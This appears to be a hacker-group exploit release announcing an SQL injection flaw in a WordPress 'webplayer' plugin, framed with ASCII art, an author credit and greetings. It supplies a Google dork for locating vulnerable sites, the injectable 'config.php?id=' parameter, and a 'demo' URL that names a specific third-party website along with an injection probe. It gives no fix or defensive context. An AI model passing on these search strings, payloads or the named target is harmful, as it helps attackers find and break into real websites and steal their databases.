((|))((|)) ((|)) |)| (|)| |) ((|)) *********************** ((|)) ********************* * ((|)) * * *0* ((|)) * In the name of iran * * ((|)) * * -|- ((|)) ******************* | ((|)) ********* ((|))((|))((|))################((|))########################((|)) # Exploit Title: Wordpress webplayer-plugin/ Theme SQL Injection ((|)) # Google Dork: inurl:wp-content/plugins/webplayer/config.php?id= ((|)) # Exploit Author: Novin hack # # Category: Web Application # # Tested on: Windows 7 # ###############################((|))############################# #******************************((|))****************************# #* Location: http://site.com/wp-content/ # #* /plugins/webplayer/config.php?id=[SQLi] # #* # #* Demo: http://www.thedreamcometrue.com/wp-content/plugins/ # #* webplayer/config.php?id=null' # #******************************((|))****************************# #******************************((|))****************************# #******************************((|))****************************# #* ***************** # #* * * # #* Greetz to: * Arash.F * # #* * * # #* ***************** # #* # #* #* # #* #* # #* #* # #* #* # #* #* # #*************************************************************** #*###############################################################